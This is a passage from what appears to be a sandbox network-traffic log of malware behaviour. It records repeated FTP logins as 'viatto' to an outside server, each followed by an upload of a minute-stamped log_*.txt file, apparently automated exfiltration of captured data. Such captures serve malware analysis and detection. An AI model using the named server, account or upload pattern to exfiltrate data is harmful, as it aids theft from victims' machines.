                                                                                                                                    Oct 10, 2022 06:03:45.304114103 CEST2150045185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,205)
                                                                                                                                    Oct 10, 2022 06:03:45.333816051 CEST5004521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.53.txt
                                                                                                                                    Oct 10, 2022 06:03:45.356812954 CEST2150045185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:45.381943941 CEST2150045185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:45.565314054 CEST2150047185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:45.565380096 CEST2150047185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:45.565417051 CEST2150047185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:45.567188025 CEST5004721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:45.592593908 CEST2150047185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:45.593204021 CEST5004721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:45.618135929 CEST2150047185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:45.620781898 CEST5004721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:45.645576954 CEST2150047185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:45.646318913 CEST5004721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:45.671644926 CEST2150047185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:45.672451019 CEST5004721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:45.696194887 CEST2150047185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:45.698184967 CEST5004721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:45.721636057 CEST2150047185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,206)
                                                                                                                                    Oct 10, 2022 06:03:45.746273041 CEST5004721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.54.txt
                                                                                                                                    Oct 10, 2022 06:03:45.771336079 CEST2150047185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:45.795238972 CEST2150047185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:45.988490105 CEST2150049185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:45.988542080 CEST2150049185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:45.988603115 CEST2150049185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:45.988924980 CEST5004921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:46.013303041 CEST2150049185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:46.013700962 CEST5004921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:46.038439035 CEST2150049185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:46.038836002 CEST5004921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:46.062947989 CEST2150049185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:46.063539982 CEST5004921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:46.089870930 CEST2150049185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:46.092803001 CEST5004921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:46.117150068 CEST2150049185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:46.118477106 CEST5004921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:46.144226074 CEST2150049185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,207)
                                                                                                                                    Oct 10, 2022 06:03:46.168512106 CEST5004921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.55.txt
                                                                                                                                    Oct 10, 2022 06:03:46.196412086 CEST2150049185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:46.220057011 CEST2150049185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:46.400814056 CEST2150051185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:46.400867939 CEST2150051185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:46.401017904 CEST2150051185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:46.401447058 CEST5005121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:46.424583912 CEST2150051185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:46.430162907 CEST5005121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:46.453761101 CEST2150051185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:46.454081059 CEST5005121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:46.477193117 CEST2150051185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:46.477575064 CEST5005121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:46.500986099 CEST2150051185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:46.501653910 CEST5005121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:46.524890900 CEST2150051185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:46.533862114 CEST5005121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:46.557859898 CEST2150051185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,208)
                                                                                                                                    Oct 10, 2022 06:03:46.585663080 CEST5005121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.56.txt
                                                                                                                                    Oct 10, 2022 06:03:46.611516953 CEST2150051185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:46.638716936 CEST2150051185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:46.844188929 CEST2150053185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:46.844243050 CEST2150053185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:46.844276905 CEST2150053185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:46.845449924 CEST5005321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:46.868557930 CEST2150053185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:46.876368046 CEST5005321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:46.899535894 CEST2150053185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:46.900010109 CEST5005321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:46.924875021 CEST2150053185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:46.925158024 CEST5005321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:46.948704004 CEST2150053185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:46.949384928 CEST5005321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:46.972186089 CEST2150053185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:46.974683046 CEST5005321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:46.998035908 CEST2150053185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,210)
                                                                                                                                    Oct 10, 2022 06:03:47.023335934 CEST5005321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.57.txt
                                                                                                                                    Oct 10, 2022 06:03:47.046639919 CEST2150053185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:47.072417021 CEST2150053185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:47.314483881 CEST2150055185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:47.314538956 CEST2150055185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:47.314701080 CEST2150055185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:47.314903021 CEST5005521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:47.339221954 CEST2150055185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:47.339453936 CEST5005521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:47.365014076 CEST2150055185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:47.365274906 CEST5005521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:47.390166998 CEST2150055185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:47.390599966 CEST5005521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:47.415273905 CEST2150055185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:47.417352915 CEST5005521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:47.442738056 CEST2150055185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:47.443779945 CEST5005521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:47.468885899 CEST2150055185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,211)
                                                                                                                                    Oct 10, 2022 06:03:47.499370098 CEST5005521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.58.txt
                                                                                                                                    Oct 10, 2022 06:03:47.525958061 CEST2150055185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:47.555993080 CEST2150055185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:47.763926029 CEST2150057185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:47.763959885 CEST2150057185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:47.764292002 CEST2150057185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:47.769892931 CEST5005721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:47.792859077 CEST2150057185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:47.794842958 CEST5005721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:47.818097115 CEST2150057185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:47.818903923 CEST5005721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:47.841526985 CEST2150057185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:47.842941046 CEST5005721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:47.866054058 CEST2150057185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:47.867042065 CEST5005721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:47.890510082 CEST2150057185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:47.896291971 CEST5005721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:47.919975996 CEST2150057185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,212)
                                                                                                                                    Oct 10, 2022 06:03:47.945312023 CEST5005721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.59.txt
                                                                                                                                    Oct 10, 2022 06:03:47.968365908 CEST2150057185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:47.994354963 CEST2150057185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:48.192089081 CEST2150059185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:48.192162991 CEST2150059185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:48.192197084 CEST2150059185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:48.192476034 CEST5005921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:48.215605974 CEST2150059185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:48.219027042 CEST5005921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:48.288103104 CEST2150059185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:48.289231062 CEST5005921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:48.312504053 CEST2150059185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:48.312884092 CEST5005921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:48.336663008 CEST2150059185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:48.337760925 CEST5005921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:48.360769033 CEST2150059185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:48.363379955 CEST5005921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:48.386904001 CEST2150059185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,213)
                                                                                                                                    Oct 10, 2022 06:03:48.419105053 CEST5005921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_09.00.txt
                                                                                                                                    Oct 10, 2022 06:03:48.443276882 CEST2150059185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:48.468880892 CEST2150059185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:48.674148083 CEST2150061185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:48.674192905 CEST2150061185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:48.674225092 CEST2150061185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:48.675117970 CEST5006121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:48.699726105 CEST2150061185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:48.703018904 CEST5006121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:48.727000952 CEST2150061185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:48.731153965 CEST5006121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:48.755197048 CEST2150061185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:48.755635977 CEST5006121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:48.779871941 CEST2150061185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:48.780844927 CEST5006121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:48.805629015 CEST2150061185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:48.807857037 CEST5006121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:48.832914114 CEST2150061185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,214)
                                                                                                                                    Oct 10, 2022 06:03:48.857772112 CEST5006121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_09.01.txt
                                                                                                                                    Oct 10, 2022 06:03:48.883349895 CEST2150061185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:48.907658100 CEST2150061185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:49.119316101 CEST2150063185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:49.119352102 CEST2150063185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:49.119385004 CEST2150063185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:49.120009899 CEST5006321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:49.148771048 CEST2150063185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:49.149225950 CEST5006321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:49.176139116 CEST2150063185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:49.176486969 CEST5006321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:49.204397917 CEST2150063185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:49.204689026 CEST5006321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:49.233434916 CEST2150063185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:49.234196901 CEST5006321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:49.260977030 CEST2150063185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:49.267811060 CEST5006321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:49.295609951 CEST2150063185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,216)
                                                                                                                                    Oct 10, 2022 06:03:49.319530010 CEST5006321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_09.02.txt
                                                                                                                                    Oct 10, 2022 06:03:49.347831964 CEST2150063185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:49.373295069 CEST2150063185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:49.586853027 CEST2150065185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:49.586947918 CEST2150065185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:49.587352037 CEST2150065185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:49.587524891 CEST5006521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:49.610296965 CEST2150065185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:49.612807989 CEST5006521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:49.635874987 CEST2150065185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:49.636230946 CEST5006521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:49.659084082 CEST2150065185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:49.659562111 CEST5006521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:49.682507038 CEST2150065185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:49.683144093 CEST5006521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:49.705873013 CEST2150065185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:49.712784052 CEST5006521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:49.736105919 CEST2150065185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,217)
                                                                                                                                    Oct 10, 2022 06:03:49.759854078 CEST5006521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_09.03.txt
                                                                                                                                    Oct 10, 2022 06:03:49.783394098 CEST2150065185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:49.809792042 CEST2150065185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:50.022146940 CEST2150067185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:50.022202015 CEST2150067185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:50.022265911 CEST2150067185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:50.024293900 CEST5006721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:50.050896883 CEST2150067185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:50.051139116 CEST5006721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:50.076445103 CEST2150067185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:50.076661110 CEST5006721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:50.102011919 CEST2150067185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:50.102247953 CEST5006721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:50.127914906 CEST2150067185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:50.128437042 CEST5006721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:50.155838013 CEST2150067185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:50.157030106 CEST5006721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:50.183167934 CEST2150067185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,218)
                                                                                                                                    Oct 10, 2022 06:03:50.208374977 CEST5006721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_09.04.txt
                                                                                                                                    Oct 10, 2022 06:03:50.233522892 CEST2150067185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:50.261684895 CEST2150067185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:50.488667011 CEST2150069185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:50.488718033 CEST2150069185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:50.488750935 CEST2150069185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:50.489145994 CEST5006921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:50.516597033 CEST2150069185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:50.516875982 CEST5006921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:50.544970036 CEST2150069185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:50.545557976 CEST5006921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:50.573985100 CEST2150069185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:50.574637890 CEST5006921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:50.600369930 CEST2150069185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:50.601013899 CEST5006921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:50.628870010 CEST2150069185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:50.629884958 CEST5006921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:50.657190084 CEST2150069185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,219)
                                                                                                                                    Oct 10, 2022 06:03:50.681185961 CEST5006921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_09.05.txt
                                                                                                                                    Oct 10, 2022 06:03:50.770750046 CEST2150069185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:50.803304911 CEST2150069185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:51.023516893 CEST2150071185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:51.023552895 CEST2150071185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:51.023574114 CEST2150071185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:51.024380922 CEST5007121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:51.047225952 CEST2150071185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:51.059552908 CEST5007121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:51.082802057 CEST2150071185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:51.084208965 CEST5007121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:51.107197046 CEST2150071185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:51.107873917 CEST5007121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:51.131225109 CEST2150071185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:51.133488894 CEST5007121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:51.156677961 CEST2150071185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:51.159336090 CEST5007121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:51.183248997 CEST2150071185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,220)
                                                                                                                                    Oct 10, 2022 06:03:51.208801985 CEST5007121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_09.06.txt
                                                                                                                                    Oct 10, 2022 06:03:51.232091904 CEST2150071185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:51.260199070 CEST2150071185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:51.557420015 CEST2150073185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:51.557796001 CEST2150073185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:51.557815075 CEST2150073185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:51.558228016 CEST5007321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:51.580809116 CEST2150073185.106.92.60192.168.2.3331 Password required for viatto
